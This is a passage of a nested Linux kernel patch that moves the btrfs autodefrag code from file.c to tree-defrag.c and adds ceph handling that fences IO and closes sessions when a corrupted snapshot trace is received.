+-	u64 ino;
+-	/*
+-	 * transid where the defrag was added, we search for
+-	 * extents newer than this
+-	 */
+-	u64 transid;
+-
+-	/* root objectid */
+-	u64 root;
+-
+-	/*
+-	 * The extent size threshold for autodefrag.
+-	 *
+-	 * This value is different for compressed/non-compressed extents,
+-	 * thus needs to be passed from higher layer.
+-	 * (aka, inode_should_defrag())
+-	 */
+-	u32 extent_thresh;
+-};
+-
+-static int __compare_inode_defrag(struct inode_defrag *defrag1,
+-				  struct inode_defrag *defrag2)
+-{
+-	if (defrag1->root > defrag2->root)
+-		return 1;
+-	else if (defrag1->root < defrag2->root)
+-		return -1;
+-	else if (defrag1->ino > defrag2->ino)
+-		return 1;
+-	else if (defrag1->ino < defrag2->ino)
+-		return -1;
+-	else
+-		return 0;
+-}
+-
+-/* pop a record for an inode into the defrag tree.  The lock
+- * must be held already
+- *
+- * If you're inserting a record for an older transid than an
+- * existing record, the transid already in the tree is lowered
+- *
+- * If an existing record is found the defrag item you
+- * pass in is freed
+- */
+-static int __btrfs_add_inode_defrag(struct btrfs_inode *inode,
+-				    struct inode_defrag *defrag)
+-{
+-	struct btrfs_fs_info *fs_info = inode->root->fs_info;
+-	struct inode_defrag *entry;
+-	struct rb_node **p;
+-	struct rb_node *parent = NULL;
+-	int ret;
+-
+-	p = &fs_info->defrag_inodes.rb_node;
+-	while (*p) {
+-		parent = *p;
+-		entry = rb_entry(parent, struct inode_defrag, rb_node);
+-
+-		ret = __compare_inode_defrag(defrag, entry);
+-		if (ret < 0)
+-			p = &parent->rb_left;
+-		else if (ret > 0)
+-			p = &parent->rb_right;
+-		else {
+-			/* if we're reinserting an entry for
+-			 * an old defrag run, make sure to
+-			 * lower the transid of our existing record
+-			 */
+-			if (defrag->transid < entry->transid)
+-				entry->transid = defrag->transid;
+-			entry->extent_thresh = min(defrag->extent_thresh,
+-						   entry->extent_thresh);
+-			return -EEXIST;
+-		}
+-	}
+-	set_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags);
+-	rb_link_node(&defrag->rb_node, parent, p);
+-	rb_insert_color(&defrag->rb_node, &fs_info->defrag_inodes);
+-	return 0;
+-}
+-
+-static inline int __need_auto_defrag(struct btrfs_fs_info *fs_info)
+-{
+-	if (!btrfs_test_opt(fs_info, AUTO_DEFRAG))
+-		return 0;
+-
+-	if (btrfs_fs_closing(fs_info))
+-		return 0;
+-
+-	return 1;
+-}
+-
+-/*
+- * insert a defrag record for this inode if auto defrag is
+- * enabled
+- */
+-int btrfs_add_inode_defrag(struct btrfs_trans_handle *trans,
+-			   struct btrfs_inode *inode, u32 extent_thresh)
+-{
+-	struct btrfs_root *root = inode->root;
+-	struct btrfs_fs_info *fs_info = root->fs_info;
+-	struct inode_defrag *defrag;
+-	u64 transid;
+-	int ret;
+-
+-	if (!__need_auto_defrag(fs_info))
+-		return 0;
+-
+-	if (test_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags))
+-		return 0;
+-
+-	if (trans)
+-		transid = trans->transid;
+-	else
+-		transid = inode->root->last_trans;
+-
+-	defrag = kmem_cache_zalloc(btrfs_inode_defrag_cachep, GFP_NOFS);
+-	if (!defrag)
+-		return -ENOMEM;
+-
+-	defrag->ino = btrfs_ino(inode);
+-	defrag->transid = transid;
+-	defrag->root = root->root_key.objectid;
+-	defrag->extent_thresh = extent_thresh;
+-
+-	spin_lock(&fs_info->defrag_inodes_lock);
+-	if (!test_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags)) {
+-		/*
+-		 * If we set IN_DEFRAG flag and evict the inode from memory,
+-		 * and then re-read this inode, this new inode doesn't have
+-		 * IN_DEFRAG flag. At the case, we may find the existed defrag.
+-		 */
+-		ret = __btrfs_add_inode_defrag(inode, defrag);
+-		if (ret)
+-			kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
+-	} else {
+-		kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
+-	}
+-	spin_unlock(&fs_info->defrag_inodes_lock);
+-	return 0;
+-}
+-
+-/*
+- * pick the defragable inode that we want, if it doesn't exist, we will get
+- * the next one.
+- */
+-static struct inode_defrag *
+-btrfs_pick_defrag_inode(struct btrfs_fs_info *fs_info, u64 root, u64 ino)
+-{
+-	struct inode_defrag *entry = NULL;
+-	struct inode_defrag tmp;
+-	struct rb_node *p;
+-	struct rb_node *parent = NULL;
+-	int ret;
+-
+-	tmp.ino = ino;
+-	tmp.root = root;
+-
+-	spin_lock(&fs_info->defrag_inodes_lock);
+-	p = fs_info->defrag_inodes.rb_node;
+-	while (p) {
+-		parent = p;
+-		entry = rb_entry(parent, struct inode_defrag, rb_node);
+-
+-		ret = __compare_inode_defrag(&tmp, entry);
+-		if (ret < 0)
+-			p = parent->rb_left;
+-		else if (ret > 0)
+-			p = parent->rb_right;
+-		else
+-			goto out;
+-	}
+-
+-	if (parent && __compare_inode_defrag(&tmp, entry) > 0) {
+-		parent = rb_next(parent);
+-		if (parent)
+-			entry = rb_entry(parent, struct inode_defrag, rb_node);
+-		else
+-			entry = NULL;
+-	}
+-out:
+-	if (entry)
+-		rb_erase(parent, &fs_info->defrag_inodes);
+-	spin_unlock(&fs_info->defrag_inodes_lock);
+-	return entry;
+-}
+-
+-void btrfs_cleanup_defrag_inodes(struct btrfs_fs_info *fs_info)
+-{
+-	struct inode_defrag *defrag;
+-	struct rb_node *node;
+-
+-	spin_lock(&fs_info->defrag_inodes_lock);
+-	node = rb_first(&fs_info->defrag_inodes);
+-	while (node) {
+-		rb_erase(node, &fs_info->defrag_inodes);
+-		defrag = rb_entry(node, struct inode_defrag, rb_node);
+-		kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
+-
+-		cond_resched_lock(&fs_info->defrag_inodes_lock);
+-
+-		node = rb_first(&fs_info->defrag_inodes);
+-	}
+-	spin_unlock(&fs_info->defrag_inodes_lock);
+-}
+-
+-#define BTRFS_DEFRAG_BATCH	1024
+-
+-static int __btrfs_run_defrag_inode(struct btrfs_fs_info *fs_info,
+-				    struct inode_defrag *defrag)
+-{
+-	struct btrfs_root *inode_root;
+-	struct inode *inode;
+-	struct btrfs_ioctl_defrag_range_args range;
+-	int ret = 0;
+-	u64 cur = 0;
+-
+-again:
+-	if (test_bit(BTRFS_FS_STATE_REMOUNTING, &fs_info->fs_state))
+-		goto cleanup;
+-	if (!__need_auto_defrag(fs_info))
+-		goto cleanup;
+-
+-	/* get the inode */
+-	inode_root = btrfs_get_fs_root(fs_info, defrag->root, true);
+-	if (IS_ERR(inode_root)) {
+-		ret = PTR_ERR(inode_root);
+-		goto cleanup;
+-	}
+-
+-	inode = btrfs_iget(fs_info->sb, defrag->ino, inode_root);
+-	btrfs_put_root(inode_root);
+-	if (IS_ERR(inode)) {
+-		ret = PTR_ERR(inode);
+-		goto cleanup;
+-	}
+-
+-	if (cur >= i_size_read(inode)) {
+-		iput(inode);
+-		goto cleanup;
+-	}
+-
+-	/* do a chunk of defrag */
+-	clear_bit(BTRFS_INODE_IN_DEFRAG, &BTRFS_I(inode)->runtime_flags);
+-	memset(&range, 0, sizeof(range));
+-	range.len = (u64)-1;
+-	range.start = cur;
+-	range.extent_thresh = defrag->extent_thresh;
+-
+-	sb_start_write(fs_info->sb);
+-	ret = btrfs_defrag_file(inode, NULL, &range, defrag->transid,
+-				       BTRFS_DEFRAG_BATCH);
+-	sb_end_write(fs_info->sb);
+-	iput(inode);
+-
+-	if (ret < 0)
+-		goto cleanup;
+-
+-	cur = max(cur + fs_info->sectorsize, range.start);
+-	goto again;
+-
+-cleanup:
+-	kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
+-	return ret;
+-}
+-
+-/*
+- * run through the list of inodes in the FS that need
+- * defragging
+- */
+-int btrfs_run_defrag_inodes(struct btrfs_fs_info *fs_info)
+-{
+-	struct inode_defrag *defrag;
+-	u64 first_ino = 0;
+-	u64 root_objectid = 0;
+-
+-	atomic_inc(&fs_info->defrag_running);
+-	while (1) {
+-		/* Pause the auto defragger. */
+-		if (test_bit(BTRFS_FS_STATE_REMOUNTING,
+-			     &fs_info->fs_state))
+-			break;
+-
+-		if (!__need_auto_defrag(fs_info))
+-			break;
+-
+-		/* find an inode to defrag */
+-		defrag = btrfs_pick_defrag_inode(fs_info, root_objectid,
+-						 first_ino);
+-		if (!defrag) {
+-			if (root_objectid || first_ino) {
+-				root_objectid = 0;
+-				first_ino = 0;
+-				continue;
+-			} else {
+-				break;
+-			}
+-		}
+-
+-		first_ino = defrag->ino + 1;
+-		root_objectid = defrag->root;
+-
+-		__btrfs_run_defrag_inode(fs_info, defrag);
+-	}
+-	atomic_dec(&fs_info->defrag_running);
+-
+-	/*
+-	 * during unmount, we use the transaction_wait queue to
+-	 * wait for the defragger to stop
+-	 */
+-	wake_up(&fs_info->transaction_wait);
+-	return 0;
+-}
+-
+ /* simple helper to fault in pages and copy.  This should go away
+  * and be replaced with calls into generic code.
+  */
+@@ -4130,23 +3807,6 @@ const struct file_operations btrfs_file_operations = {
+ 	.remap_file_range = btrfs_remap_file_range,
+ };
+ 
+-void __cold btrfs_auto_defrag_exit(void)
+-{
+-	kmem_cache_destroy(btrfs_inode_defrag_cachep);
+-}
+-
+-int __init btrfs_auto_defrag_init(void)
+-{
+-	btrfs_inode_defrag_cachep = kmem_cache_create("btrfs_inode_defrag",
+-					sizeof(struct inode_defrag), 0,
+-					SLAB_MEM_SPREAD,
+-					NULL);
+-	if (!btrfs_inode_defrag_cachep)
+-		return -ENOMEM;
+-
+-	return 0;
+-}
+-
+ int btrfs_fdatawrite_range(struct inode *inode, loff_t start, loff_t end)
+ {
+ 	int ret;
+diff --git a/fs/btrfs/tree-defrag.c b/fs/btrfs/tree-defrag.c
+index 072ab9a1374b5..0520d6d32a2db 100644
+--- a/fs/btrfs/tree-defrag.c
++++ b/fs/btrfs/tree-defrag.c
+@@ -10,6 +10,326 @@
+ #include "transaction.h"
+ #include "locking.h"
+ 
++static struct kmem_cache *btrfs_inode_defrag_cachep;
++
++/*
++ * When auto defrag is enabled we queue up these defrag structs to remember
++ * which inodes need defragging passes.
++ */
++struct inode_defrag {
++	struct rb_node rb_node;
++	/* Inode number */
++	u64 ino;
++	/*
++	 * Transid where the defrag was added, we search for extents newer than
++	 * this.
++	 */
++	u64 transid;
++
++	/* Root objectid */
++	u64 root;
++
++	/*
++	 * The extent size threshold for autodefrag.
++	 *
++	 * This value is different for compressed/non-compressed extents, thus
++	 * needs to be passed from higher layer.
++	 * (aka, inode_should_defrag())
++	 */
++	u32 extent_thresh;
++};
++
++static int __compare_inode_defrag(struct inode_defrag *defrag1,
++				  struct inode_defrag *defrag2)
++{
++	if (defrag1->root > defrag2->root)
++		return 1;
++	else if (defrag1->root < defrag2->root)
++		return -1;
++	else if (defrag1->ino > defrag2->ino)
++		return 1;
++	else if (defrag1->ino < defrag2->ino)
++		return -1;
++	else
++		return 0;
++}
++
++/*
++ * Pop a record for an inode into the defrag tree.  The lock must be held
++ * already.
++ *
++ * If you're inserting a record for an older transid than an existing record,
++ * the transid already in the tree is lowered.
++ *
++ * If an existing record is found the defrag item you pass in is freed.
++ */
++static int __btrfs_add_inode_defrag(struct btrfs_inode *inode,
++				    struct inode_defrag *defrag)
++{
++	struct btrfs_fs_info *fs_info = inode->root->fs_info;
++	struct inode_defrag *entry;
++	struct rb_node **p;
++	struct rb_node *parent = NULL;
++	int ret;
++
++	p = &fs_info->defrag_inodes.rb_node;
++	while (*p) {
++		parent = *p;
++		entry = rb_entry(parent, struct inode_defrag, rb_node);
++
++		ret = __compare_inode_defrag(defrag, entry);
++		if (ret < 0)
++			p = &parent->rb_left;
++		else if (ret > 0)
++			p = &parent->rb_right;
++		else {
++			/*
++			 * If we're reinserting an entry for an old defrag run,
++			 * make sure to lower the transid of our existing
++			 * record.
++			 */
++			if (defrag->transid < entry->transid)
++				entry->transid = defrag->transid;
++			entry->extent_thresh = min(defrag->extent_thresh,
++						   entry->extent_thresh);
++			return -EEXIST;
++		}
++	}
++	set_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags);
++	rb_link_node(&defrag->rb_node, parent, p);
++	rb_insert_color(&defrag->rb_node, &fs_info->defrag_inodes);
++	return 0;
++}
++
++static inline int __need_auto_defrag(struct btrfs_fs_info *fs_info)
++{
++	if (!btrfs_test_opt(fs_info, AUTO_DEFRAG))
++		return 0;
++
++	if (btrfs_fs_closing(fs_info))
++		return 0;
++
++	return 1;
++}
++
++/*
++ * Insert a defrag record for this inode if auto defrag is enabled.
++ */
++int btrfs_add_inode_defrag(struct btrfs_trans_handle *trans,
++			   struct btrfs_inode *inode, u32 extent_thresh)
++{
++	struct btrfs_root *root = inode->root;
++	struct btrfs_fs_info *fs_info = root->fs_info;
++	struct inode_defrag *defrag;
++	u64 transid;
++	int ret;
++
++	if (!__need_auto_defrag(fs_info))
++		return 0;
++
++	if (test_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags))
++		return 0;
++
++	if (trans)
++		transid = trans->transid;
++	else
++		transid = inode->root->last_trans;
++
++	defrag = kmem_cache_zalloc(btrfs_inode_defrag_cachep, GFP_NOFS);
++	if (!defrag)
++		return -ENOMEM;
++
++	defrag->ino = btrfs_ino(inode);
++	defrag->transid = transid;
++	defrag->root = root->root_key.objectid;
++	defrag->extent_thresh = extent_thresh;
++
++	spin_lock(&fs_info->defrag_inodes_lock);
++	if (!test_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags)) {
++		/*
++		 * If we set IN_DEFRAG flag and evict the inode from memory,
++		 * and then re-read this inode, this new inode doesn't have
++		 * IN_DEFRAG flag. At the case, we may find the existed defrag.
++		 */
++		ret = __btrfs_add_inode_defrag(inode, defrag);
++		if (ret)
++			kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
++	} else {
++		kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
++	}
++	spin_unlock(&fs_info->defrag_inodes_lock);
++	return 0;
++}
++
++/*
++ * Pick the defragable inode that we want, if it doesn't exist, we will get the
++ * next one.
++ */
++static struct inode_defrag *btrfs_pick_defrag_inode(
++			struct btrfs_fs_info *fs_info, u64 root, u64 ino)
++{
++	struct inode_defrag *entry = NULL;
++	struct inode_defrag tmp;
++	struct rb_node *p;
++	struct rb_node *parent = NULL;
++	int ret;
++
++	tmp.ino = ino;
++	tmp.root = root;
++
++	spin_lock(&fs_info->defrag_inodes_lock);
++	p = fs_info->defrag_inodes.rb_node;
++	while (p) {
++		parent = p;
++		entry = rb_entry(parent, struct inode_defrag, rb_node);
++
++		ret = __compare_inode_defrag(&tmp, entry);
++		if (ret < 0)
++			p = parent->rb_left;
++		else if (ret > 0)
++			p = parent->rb_right;
++		else
++			goto out;
++	}
++
++	if (parent && __compare_inode_defrag(&tmp, entry) > 0) {
++		parent = rb_next(parent);
++		if (parent)
++			entry = rb_entry(parent, struct inode_defrag, rb_node);
++		else
++			entry = NULL;
++	}
++out:
++	if (entry)
++		rb_erase(parent, &fs_info->defrag_inodes);
++	spin_unlock(&fs_info->defrag_inodes_lock);
++	return entry;
++}
++
++void btrfs_cleanup_defrag_inodes(struct btrfs_fs_info *fs_info)
++{
++	struct inode_defrag *defrag;
++	struct rb_node *node;
++
++	spin_lock(&fs_info->defrag_inodes_lock);
++	node = rb_first(&fs_info->defrag_inodes);
++	while (node) {
++		rb_erase(node, &fs_info->defrag_inodes);
++		defrag = rb_entry(node, struct inode_defrag, rb_node);
++		kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
++
++		cond_resched_lock(&fs_info->defrag_inodes_lock);
++
++		node = rb_first(&fs_info->defrag_inodes);
++	}
++	spin_unlock(&fs_info->defrag_inodes_lock);
++}
++
++#define BTRFS_DEFRAG_BATCH	1024
++
++static int __btrfs_run_defrag_inode(struct btrfs_fs_info *fs_info,
++				    struct inode_defrag *defrag)
++{
++	struct btrfs_root *inode_root;
++	struct inode *inode;
++	struct btrfs_ioctl_defrag_range_args range;
++	int ret = 0;
++	u64 cur = 0;
++
++again:
++	if (test_bit(BTRFS_FS_STATE_REMOUNTING, &fs_info->fs_state))
++		goto cleanup;
++	if (!__need_auto_defrag(fs_info))
++		goto cleanup;
++
++	/* Get the inode */
++	inode_root = btrfs_get_fs_root(fs_info, defrag->root, true);
++	if (IS_ERR(inode_root)) {
++		ret = PTR_ERR(inode_root);
++		goto cleanup;
++	}
++
++	inode = btrfs_iget(fs_info->sb, defrag->ino, inode_root);
++	btrfs_put_root(inode_root);
++	if (IS_ERR(inode)) {
++		ret = PTR_ERR(inode);
++		goto cleanup;
++	}
++
++	if (cur >= i_size_read(inode)) {
++		iput(inode);
++		goto cleanup;
++	}
++
++	/* Do a chunk of defrag */
++	clear_bit(BTRFS_INODE_IN_DEFRAG, &BTRFS_I(inode)->runtime_flags);
++	memset(&range, 0, sizeof(range));
++	range.len = (u64)-1;
++	range.start = cur;
++	range.extent_thresh = defrag->extent_thresh;
++
++	sb_start_write(fs_info->sb);
++	ret = btrfs_defrag_file(inode, NULL, &range, defrag->transid,
++				       BTRFS_DEFRAG_BATCH);
++	sb_end_write(fs_info->sb);
++	iput(inode);
++
++	if (ret < 0)
++		goto cleanup;
++
++	cur = max(cur + fs_info->sectorsize, range.start);
++	goto again;
++
++cleanup:
++	kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
++	return ret;
++}
++
++/*
++ * Run through the list of inodes in the FS that need defragging.
++ */
++int btrfs_run_defrag_inodes(struct btrfs_fs_info *fs_info)
++{
++	struct inode_defrag *defrag;
++	u64 first_ino = 0;
++	u64 root_objectid = 0;
++
++	atomic_inc(&fs_info->defrag_running);
++	while (1) {
++		/* Pause the auto defragger. */
++		if (test_bit(BTRFS_FS_STATE_REMOUNTING, &fs_info->fs_state))
++			break;
++
++		if (!__need_auto_defrag(fs_info))
++			break;
++
++		/* find an inode to defrag */
++		defrag = btrfs_pick_defrag_inode(fs_info, root_objectid, first_ino);
++		if (!defrag) {
++			if (root_objectid || first_ino) {
++				root_objectid = 0;
++				first_ino = 0;
++				continue;
++			} else {
++				break;
++			}
++		}
++
++		first_ino = defrag->ino + 1;
++		root_objectid = defrag->root;
++
++		__btrfs_run_defrag_inode(fs_info, defrag);
++	}
++	atomic_dec(&fs_info->defrag_running);
++
++	/*
++	 * During unmount, we use the transaction_wait queue to wait for the
++	 * defragger to stop.
++	 */
++	wake_up(&fs_info->transaction_wait);
++	return 0;
++}
++
+ /*
+  * Defrag all the leaves in a given btree.
+  * Read all the leaves and try to get key order to
+@@ -132,3 +452,20 @@ done:
+ 
+ 	return ret;
+ }
++
++void __cold btrfs_auto_defrag_exit(void)
++{
++	kmem_cache_destroy(btrfs_inode_defrag_cachep);
++}
++
++int __init btrfs_auto_defrag_init(void)
++{
++	btrfs_inode_defrag_cachep = kmem_cache_create("btrfs_inode_defrag",
++					sizeof(struct inode_defrag), 0,
++					SLAB_MEM_SPREAD,
++					NULL);
++	if (!btrfs_inode_defrag_cachep)
++		return -ENOMEM;
++
++	return 0;
++}
+diff --git a/fs/ceph/addr.c b/fs/ceph/addr.c
+index 61f47debec5ac..478c03bfba663 100644
+--- a/fs/ceph/addr.c
++++ b/fs/ceph/addr.c
+@@ -305,7 +305,7 @@ static void ceph_netfs_issue_read(struct netfs_io_subrequest *subreq)
+ 	struct inode *inode = rreq->inode;
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct ceph_fs_client *fsc = ceph_inode_to_client(inode);
+-	struct ceph_osd_request *req;
++	struct ceph_osd_request *req = NULL;
+ 	struct ceph_vino vino = ceph_vino(inode);
+ 	struct iov_iter iter;
+ 	struct page **pages;
+@@ -313,6 +313,11 @@ static void ceph_netfs_issue_read(struct netfs_io_subrequest *subreq)
+ 	int err = 0;
+ 	u64 len = subreq->len;
+ 
++	if (ceph_inode_is_shutdown(inode)) {
++		err = -EIO;
++		goto out;
++	}
++
+ 	if (ceph_has_inline_data(ci) && ceph_netfs_issue_op_inline(subreq))
+ 		return;
+ 
+@@ -563,6 +568,9 @@ static int writepage_nounlock(struct page *page, struct writeback_control *wbc)
+ 
+ 	dout("writepage %p idx %lu\n", page, page->index);
+ 
++	if (ceph_inode_is_shutdown(inode))
++		return -EIO;
++
+ 	/* verify this is a writeable snap context */
+ 	snapc = page_snap_context(page);
+ 	if (!snapc) {
+@@ -1643,7 +1651,7 @@ int ceph_uninline_data(struct file *file)
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct ceph_fs_client *fsc = ceph_inode_to_client(inode);
+ 	struct ceph_osd_request *req = NULL;
+-	struct ceph_cap_flush *prealloc_cf;
++	struct ceph_cap_flush *prealloc_cf = NULL;
+ 	struct folio *folio = NULL;
+ 	u64 inline_version = CEPH_INLINE_NONE;
+ 	struct page *pages[1];
+@@ -1657,6 +1665,11 @@ int ceph_uninline_data(struct file *file)
+ 	dout("uninline_data %p %llx.%llx inline_version %llu\n",
+ 	     inode, ceph_vinop(inode), inline_version);
+ 
++	if (ceph_inode_is_shutdown(inode)) {
++		err = -EIO;
++		goto out;
++	}
++
+ 	if (inline_version == CEPH_INLINE_NONE)
+ 		return 0;
+ 
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index cd69bf267d1b1..795fd6d84bde0 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -4081,6 +4081,7 @@ void ceph_handle_caps(struct ceph_mds_session *session,
+ 	void *p, *end;
+ 	struct cap_extra_info extra_info = {};
+ 	bool queue_trunc;
++	bool close_sessions = false;
+ 
+ 	dout("handle_caps from mds%d\n", session->s_mds);
+ 
+@@ -4218,9 +4219,13 @@ void ceph_handle_caps(struct ceph_mds_session *session,
+ 		realm = NULL;
+ 		if (snaptrace_len) {
+ 			down_write(&mdsc->snap_rwsem);
+-			ceph_update_snap_trace(mdsc, snaptrace,
+-					       snaptrace + snaptrace_len,
+-					       false, &realm);
++			if (ceph_update_snap_trace(mdsc, snaptrace,
++						   snaptrace + snaptrace_len,
++						   false, &realm)) {
++				up_write(&mdsc->snap_rwsem);
++				close_sessions = true;
++				goto done;
++			}
+ 			downgrade_write(&mdsc->snap_rwsem);
+ 		} else {
+ 			down_read(&mdsc->snap_rwsem);
+@@ -4280,6 +4285,11 @@ done_unlocked:
+ 	iput(inode);
+ out:
+ 	ceph_put_string(extra_info.pool_ns);
++
++	/* Defer closing the sessions after s_mutex lock being released */
++	if (close_sessions)
++		ceph_mdsc_close_sessions(mdsc);
++
+ 	return;
+ 
+ flush_cap_releases:
+diff --git a/fs/ceph/file.c b/fs/ceph/file.c
+index 6f9580defb2b3..5895797f3104a 100644
+--- a/fs/ceph/file.c
++++ b/fs/ceph/file.c
+@@ -2004,6 +2004,9 @@ static int ceph_zero_partial_object(struct inode *inode,
+ 	loff_t zero = 0;
+ 	int op;
+ 
++	if (ceph_inode_is_shutdown(inode))
++		return -EIO;
++
+ 	if (!length) {
+ 		op = offset ? CEPH_OSD_OP_DELETE : CEPH_OSD_OP_TRUNCATE;
+ 		length = &zero;
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 756560df3bdbd..27a245d959c0a 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -806,6 +806,9 @@ static struct ceph_mds_session *register_session(struct ceph_mds_client *mdsc,
+ {
+ 	struct ceph_mds_session *s;
+ 
++	if (READ_ONCE(mdsc->fsc->mount_state) == CEPH_MOUNT_FENCE_IO)
++		return ERR_PTR(-EIO);
++
+ 	if (mds >= mdsc->mdsmap->possible_max_rank)
+ 		return ERR_PTR(-EINVAL);
+ 
+@@ -1478,6 +1481,9 @@ static int __open_session(struct ceph_mds_client *mdsc,
+ 	int mstate;
+ 	int mds = session->s_mds;
+ 
++	if (READ_ONCE(mdsc->fsc->mount_state) == CEPH_MOUNT_FENCE_IO)
++		return -EIO;
++
+ 	/* wait for mds to go active? */
+ 	mstate = ceph_mdsmap_get_state(mdsc->mdsmap, mds);
+ 	dout("open_session to mds%d (%s)\n", mds,
+@@ -2860,6 +2866,11 @@ static void __do_request(struct ceph_mds_client *mdsc,
+ 		return;
+ 	}
+ 
++	if (READ_ONCE(mdsc->fsc->mount_state) == CEPH_MOUNT_FENCE_IO) {
++		dout("do_request metadata corrupted\n");
++		err = -EIO;
++		goto finish;
++	}
+ 	if (req->r_timeout &&
+ 	    time_after_eq(jiffies, req->r_started + req->r_timeout)) {
+ 		dout("do_request timed out\n");
+@@ -3245,6 +3256,7 @@ static void handle_reply(struct ceph_mds_session *session, struct ceph_msg *msg)
+ 	u64 tid;
+ 	int err, result;
+ 	int mds = session->s_mds;
++	bool close_sessions = false;
+ 
+ 	if (msg->front.iov_len < sizeof(*head)) {
+ 		pr_err("mdsc_handle_reply got corrupt (short) reply\n");
+@@ -3351,10 +3363,17 @@ static void handle_reply(struct ceph_mds_session *session, struct ceph_msg *msg)
+ 	realm = NULL;
+ 	if (rinfo->snapblob_len) {
+ 		down_write(&mdsc->snap_rwsem);
+-		ceph_update_snap_trace(mdsc, rinfo->snapblob,
++		err = ceph_update_snap_trace(mdsc, rinfo->snapblob,
+ 				rinfo->snapblob + rinfo->snapblob_len,
+ 				le32_to_cpu(head->op) == CEPH_MDS_OP_RMSNAP,
+ 				&realm);
++		if (err) {
++			up_write(&mdsc->snap_rwsem);
++			close_sessions = true;
++			if (err == -EIO)
++				ceph_msg_dump(msg);
++			goto out_err;
++		}
+ 		downgrade_write(&mdsc->snap_rwsem);
+ 	} else {
+ 		down_read(&mdsc->snap_rwsem);
+@@ -3412,6 +3431,10 @@ out_err:
+ 				     req->r_end_latency, err);
+ out:
+ 	ceph_mdsc_put_request(req);
++
++	/* Defer closing the sessions after s_mutex lock being released */
++	if (close_sessions)
++		ceph_mdsc_close_sessions(mdsc);
+ 	return;
+ }
+ 
+@@ -5017,7 +5040,7 @@ static bool done_closing_sessions(struct ceph_mds_client *mdsc, int skipped)
+ }
+ 
+ /*
+- * called after sb is ro.
++ * called after sb is ro or when metadata corrupted.
+  */
+ void ceph_mdsc_close_sessions(struct ceph_mds_client *mdsc)
+ {
+@@ -5307,7 +5330,8 @@ static void mds_peer_reset(struct ceph_connection *con)
+ 	struct ceph_mds_client *mdsc = s->s_mdsc;
+ 
+ 	pr_warn("mds%d closed our session\n", s->s_mds);
+-	send_mds_reconnect(mdsc, s);
++	if (READ_ONCE(mdsc->fsc->mount_state) != CEPH_MOUNT_FENCE_IO)
++		send_mds_reconnect(mdsc, s);
+ }
+ 
+ static void mds_dispatch(struct ceph_connection *con, struct ceph_msg *msg)
+diff --git a/fs/ceph/snap.c b/fs/ceph/snap.c
+index e4151852184e0..87007203f130e 100644
+--- a/fs/ceph/snap.c
++++ b/fs/ceph/snap.c
+@@ -1,6 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0
+ #include <linux/ceph/ceph_debug.h>
+ 
++#include <linux/fs.h>
+ #include <linux/sort.h>
+ #include <linux/slab.h>
+ #include <linux/iversion.h>
+@@ -766,8 +767,10 @@ int ceph_update_snap_trace(struct ceph_mds_client *mdsc,
+ 	struct ceph_snap_realm *realm;
+ 	struct ceph_snap_realm *first_realm = NULL;
+ 	struct ceph_snap_realm *realm_to_rebuild = NULL;
++	struct ceph_client *client = mdsc->fsc->client;
+ 	int rebuild_snapcs;
+ 	int err = -ENOMEM;
++	int ret;
+ 	LIST_HEAD(dirty_realms);
+ 
+ 	lockdep_assert_held_write(&mdsc->snap_rwsem);
+@@ -884,6 +887,27 @@ fail:
+ 	if (first_realm)
+ 		ceph_put_snap_realm(mdsc, first_realm);
+ 	pr_err("%s error %d\n", __func__, err);
++
++	/*
++	 * When receiving a corrupted snap trace we don't know what
++	 * exactly has happened in MDS side. And we shouldn't continue
++	 * writing to OSD, which may corrupt the snapshot contents.
++	 *
++	 * Just try to blocklist this kclient and then this kclient
++	 * must be remounted to continue after the corrupted metadata
++	 * fixed in the MDS side.
++	 */
++	WRITE_ONCE(mdsc->fsc->mount_state, CEPH_MOUNT_FENCE_IO);
++	ret = ceph_monc_blocklist_add(&client->monc, &client->msgr.inst.addr);
++	if (ret)
++		pr_err("%s failed to blocklist %s: %d\n", __func__,
++		       ceph_pr_addr(&client->msgr.inst.addr), ret);
++
++	WARN(1, "%s: %s%sdo remount to continue%s",
++	     __func__, ret ? "" : ceph_pr_addr(&client->msgr.inst.addr),
++	     ret ? "" : " was blocklisted, ",
++	     err == -EIO ? " after corrupted snaptrace is fixed" : "");
++
+ 	return err;
+ }
+ 
+@@ -984,6 +1008,7 @@ void ceph_handle_snap(struct ceph_mds_client *mdsc,
+ 	__le64 *split_inos = NULL, *split_realms = NULL;
+ 	int i;
+ 	int locked_rwsem = 0;
++	bool close_sessions = false;
+ 
+ 	/* decode */
+ 	if (msg->front.iov_len < sizeof(*h))
+@@ -1092,8 +1117,12 @@ skip_inode:
+ 	 * update using the provided snap trace. if we are deleting a
+ 	 * snap, we can avoid queueing cap_snaps.
+ 	 */
+-	ceph_update_snap_trace(mdsc, p, e,
+-			       op == CEPH_SNAP_OP_DESTROY, NULL);
++	if (ceph_update_snap_trace(mdsc, p, e,
++				   op == CEPH_SNAP_OP_DESTROY,
++				   NULL)) {
++		close_sessions = true;
++		goto bad;
++	}
+ 
+ 	if (op == CEPH_SNAP_OP_SPLIT)
+ 		/* we took a reference when we created the realm, above */
+@@ -1112,6 +1141,9 @@ bad:
+ out:
+ 	if (locked_rwsem)
+ 		up_write(&mdsc->snap_rwsem);
++
++	if (close_sessions)
++		ceph_mdsc_close_sessions(mdsc);
+ 	return;
+ }
+ 
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index ae4126f634101..3599fefa91f99 100644
+--- a/fs/ceph/super.h
